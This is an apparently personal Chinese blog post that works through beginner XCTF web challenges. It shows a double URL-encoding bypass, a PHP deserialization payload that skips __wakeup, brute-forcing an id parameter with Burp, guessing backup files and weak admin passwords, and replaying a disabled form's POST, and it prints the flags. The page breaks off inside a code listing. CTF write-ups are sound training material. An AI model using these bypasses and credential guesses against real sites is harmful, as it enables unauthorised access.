<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="还没做过攻防世界的题 做一下题目顺序是按照攻防世界的新手模式来的 1、Training-WWW-Robotsrobots想到robots协议 查看 1&#x2F;robots.txt  得到 123456User-agent: *Disallow: &#x2F;fl0g.phpUser-agent: YandexDisallow: *  访问即可 2、PHP2打开网页后发现一句话 1Can you anthentic">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界Web">
<meta property="og:url" content="https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/index.html">
<meta property="og:site_name" content="Nana">
<meta property="og:description" content="还没做过攻防世界的题 做一下题目顺序是按照攻防世界的新手模式来的 1、Training-WWW-Robotsrobots想到robots协议 查看 1&#x2F;robots.txt  得到 123456User-agent: *Disallow: &#x2F;fl0g.phpUser-agent: YandexDisallow: *  访问即可 2、PHP2打开网页后发现一句话 1Can you anthentic">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-10-01T11:57:03.000Z">
<meta property="article:modified_time" content="2024-10-02T12:50:18.854Z">
<meta property="article:author" content="Nana">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>攻防世界Web</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/01/rc4/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&text=攻防世界Web"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&is_video=false&description=攻防世界Web"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=攻防世界Web&body=Check out this article: https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&title=攻防世界Web"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&name=攻防世界Web&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://harureoo.github.io/2024/10/01/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CWeb/&t=攻防世界Web"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1%E3%80%81Training-WWW-Robots"><span class="toc-number">1.</span> <span class="toc-text">1、Training-WWW-Robots</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2%E3%80%81PHP2"><span class="toc-number">2.</span> <span class="toc-text">2、PHP2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3%E3%80%81unserialize3"><span class="toc-number">3.</span> <span class="toc-text">3、unserialize3</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4%E3%80%81ics-06"><span class="toc-number">4.</span> <span class="toc-text">4、ics-06</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5%E3%80%81view-source"><span class="toc-number">5.</span> <span class="toc-text">5、view_source</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6%E3%80%81get-post"><span class="toc-number">6.</span> <span class="toc-text">6、get_post</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7%E3%80%81robots"><span class="toc-number">7.</span> <span class="toc-text">7、robots</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8%E3%80%81backup"><span class="toc-number">8.</span> <span class="toc-text">8、backup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#8%E3%80%81cookie"><span class="toc-number">9.</span> <span class="toc-text">8、cookie</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#9%E3%80%81disabled-button"><span class="toc-number">10.</span> <span class="toc-text">9、disabled_button</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#10%E3%80%81weak-auth"><span class="toc-number">11.</span> <span class="toc-text">10、weak_auth</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#11%E3%80%81simple-php"><span class="toc-number">12.</span> <span class="toc-text">11、simple_php</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#12%E3%80%81baby-web"><span class="toc-number">13.</span> <span class="toc-text">12、baby_web</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#13%E3%80%81inget"><span class="toc-number">14.</span> <span class="toc-text">13、inget</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#14%E3%80%81"><span class="toc-number">15.</span> <span class="toc-text">14、</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        攻防世界Web
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Nana</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-10-01T11:57:03.000Z" class="dt-published" itemprop="datePublished">2024-10-01</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ctf/" rel="tag">ctf</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>还没做过攻防世界的题 做一下<br>题目顺序是按照攻防世界的新手模式来的</p>
<h1 id="1、Training-WWW-Robots"><a href="#1、Training-WWW-Robots" class="headerlink" title="1、Training-WWW-Robots"></a>1、Training-WWW-Robots</h1><p>robots想到robots协议 查看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/robots.txt</span><br></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /fl0g.php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">User-agent: Yandex</span><br><span class="line">Disallow: *</span><br></pre></td></tr></table></figure>

<p>访问即可</p>
<h1 id="2、PHP2"><a href="#2、PHP2" class="headerlink" title="2、PHP2"></a>2、PHP2</h1><p>打开网页后发现一句话</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Can you anthenticate to this website?</span><br></pre></td></tr></table></figure>

<p>通过phps查看网页源码（我还是第一次知道这个方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.105:62789/index.phps</span><br></pre></td></tr></table></figure>

<p>得到网站源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="string">&quot;admin&quot;</span>===<span class="variable">$_GET</span>[id]) &#123;</span><br><span class="line">  <span class="keyword">echo</span>(<span class="string">&quot;&lt;p&gt;not allowed!&lt;/p&gt;&quot;</span>);</span><br><span class="line">  <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$_GET</span>[id] = <span class="title function_ invoke__">urldecode</span>(<span class="variable">$_GET</span>[id]);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>[id] == <span class="string">&quot;admin&quot;</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;Access granted!&lt;/p&gt;&quot;</span>;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;Key: xxxxxxx &lt;/p&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">Can you anthenticate to this website?</span><br></pre></td></tr></table></figure>

<p>发现url解码后能够得到admin即可</p>
<p>解析时会自动解码一次，因此要编码两次。</p>
<h1 id="3、unserialize3"><a href="#3、unserialize3" class="headerlink" title="3、unserialize3"></a>3、unserialize3</h1><p>根据题目名字判断应该是反序列化的题目 打开网页后看到部分源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xctf</span></span>&#123;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$flag</span> = <span class="string">&#x27;111&#x27;</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line"><span class="keyword">exit</span>(<span class="string">&#x27;bad requests&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line">?code=</span><br></pre></td></tr></table></figure>

<p>看到__wakeup()基本上可以确定是反序列化了，?code&#x3D;应该是提示传入参数的。我们把代码补全后php运行，即可得到序列化编码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xctf</span></span>&#123;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$flag</span> = <span class="string">&#x27;111&#x27;</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line"><span class="keyword">exit</span>(<span class="string">&#x27;bad requests&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$s</span> = <span class="keyword">new</span> <span class="title function_ invoke__">xctf</span>();</span><br><span class="line"><span class="keyword">echo</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$s</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>得到序列化编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;xctf&quot;:1:&#123;s:4:&quot;flag&quot;;s:3:&quot;111&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>这时候只要跳过wakeup函数就可以避免返回bad requests了</p>
<p>修改变量个数，使其大于实际变量个数即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;xctf&quot;:3:&#123;s:4:&quot;flag&quot;;s:3:&quot;111&quot;;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="4、ics-06"><a href="#4、ics-06" class="headerlink" title="4、ics-06"></a>4、ics-06</h1><p>点开后是一个工控云管理系统，当然只是个空壳子。随便点点，发现报表中心可以点开。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.105:51353/index.php?id=1</span><br></pre></td></tr></table></figure>

<p>附加一个提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">送分题</span><br></pre></td></tr></table></figure>

<p>?id&#x3D;1这个太熟悉了 不过肯定不是sql注入 应该是爆破这种的 burp抓包弄进intruder爆破就行了<br>当爆破到2333的时候跑出了结果</p>
<h1 id="5、view-source"><a href="#5、view-source" class="headerlink" title="5、view_source"></a>5、view_source</h1><p>一眼</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view-source:</span><br></pre></td></tr></table></figure>

<h1 id="6、get-post"><a href="#6、get-post" class="headerlink" title="6、get_post"></a>6、get_post</h1><p>第一步</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">请用GET方式提交一个名为a,值为1的变量</span><br></pre></td></tr></table></figure>

<p>非常简单 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.105:49952?a=1</span><br></pre></td></tr></table></figure>

<p>第二步</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">请再以POST方式随便提交一个名为b,值为2的变量</span><br></pre></td></tr></table></figure>

<p>非常简单 hackbar或者抓包都可以 post一下即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b=2</span><br></pre></td></tr></table></figure>

<h1 id="7、robots"><a href="#7、robots" class="headerlink" title="7、robots"></a>7、robots</h1><p>robots协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.105:60926/robots.txt</span><br></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: </span><br><span class="line">Disallow: f1ag_1s_h3re.php</span><br></pre></td></tr></table></figure>

<p>前往对应页面查看即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.105:60926/f1ag_1s_h3re.php</span><br></pre></td></tr></table></figure>

<h1 id="8、backup"><a href="#8、backup" class="headerlink" title="8、backup"></a>8、backup</h1><p>备份文件 可以用dirsearch 也可以直接猜</p>
<p>给了提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">你知道index.php的备份文件名吗？</span><br></pre></td></tr></table></figure>

<p>直接猜index.php.bak 访问后下载文件得到flag</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>备份文件<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">href</span>=<span class="string">&quot;http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css&quot;</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="language-css"></span></span><br><span class="line"><span class="language-css">        <span class="selector-tag">body</span>&#123;</span></span><br><span class="line"><span class="language-css">            <span class="attribute">margin-left</span>:auto;</span></span><br><span class="line"><span class="language-css">            <span class="attribute">margin-right</span>:auto;</span></span><br><span class="line"><span class="language-css">            <span class="attribute">margin-TOP</span>:<span class="number">200PX</span>;</span></span><br><span class="line"><span class="language-css">            <span class="attribute">width</span>:<span class="number">20em</span>;</span></span><br><span class="line"><span class="language-css">        &#125;</span></span><br><span class="line"><span class="language-css">    </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">h3</span>&gt;</span>你知道index.php的备份文件名吗？<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="meta">$flag=&quot;Cyberpeace&#123;855A1C4B3401294CB6604CCC98BDE334&#125;&quot;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="8、cookie"><a href="#8、cookie" class="headerlink" title="8、cookie"></a>8、cookie</h1><p>看题目应该是flag在cookie里</p>
<p>抓包即可</p>
<p>访问cookie.php</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/cookie.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>61.147.171.105:58149</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br></pre></td></tr></table></figure>

<p>在响应包里面找到flag</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/1.1</span> <span class="number">200</span> OK</span><br><span class="line"><span class="attribute">Date</span><span class="punctuation">: </span>Wed, 02 Oct 2024 12:05:46 GMT</span><br><span class="line"><span class="attribute">Server</span><span class="punctuation">: </span>Apache/2.4.7 (Ubuntu)</span><br><span class="line"><span class="attribute">X-Powered-By</span><span class="punctuation">: </span>PHP/5.5.9-1ubuntu4.26</span><br><span class="line"><span class="attribute">flag</span><span class="punctuation">: </span>cyberpeace&#123;60799cb965bc8d8ac189f918b150ea9e&#125;</span><br><span class="line"><span class="attribute">Vary</span><span class="punctuation">: </span>Accept-Encoding</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>411</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>text/html</span><br><span class="line"></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Cookie<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">href</span>=<span class="string">&quot;http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css&quot;</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> /&gt;</span></span></span><br><span class="line"><span class="language-xml">    <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="language-css"></span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">        <span class="selector-tag">body</span>&#123;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">            <span class="attribute">margin-left</span>:auto;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">            <span class="attribute">margin-right</span>:auto;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">            <span class="attribute">margin-TOP</span>:<span class="number">200PX</span>;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">            <span class="attribute">width</span>:<span class="number">20em</span>;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">        &#125;</span></span></span><br><span class="line"><span class="language-css"><span class="language-xml">    </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">h3</span>&gt;</span>See the http response<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"></span></span><br></pre></td></tr></table></figure>



<h1 id="9、disabled-button"><a href="#9、disabled-button" class="headerlink" title="9、disabled_button"></a>9、disabled_button</h1><p>不能按的按钮 目测应该是前端修改进行绕过</p>
<p>看了一眼 第一想法是直接模拟它按下按钮后的请求就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;</span><br><span class="line">&lt;input disabled=&quot;&quot; class=&quot;btn btn-default&quot; style=&quot;height:50px;width:200px;&quot; type=&quot;submit&quot; value=&quot;flag&quot; name=&quot;auth&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>直接post 即可得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auth=flag</span><br></pre></td></tr></table></figure>

<h1 id="10、weak-auth"><a href="#10、weak-auth" class="headerlink" title="10、weak_auth"></a>10、weak_auth</h1><p>题目内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">小宁写了一个登陆验证页面，随手就设了一个密码。</span><br></pre></td></tr></table></figure>

<p>目测弱口令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">admin 123</span><br><span class="line">admin 123456</span><br></pre></td></tr></table></figure>

<p>第二个就直接过了。。</p>
<h1 id="11、simple-php"><a href="#11、simple-php" class="headerlink" title="11、simple_php"></a>11、simple_php</h1><p>给了源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">﻿<span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;config.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=@<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="variable">$b</span>=@<span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span 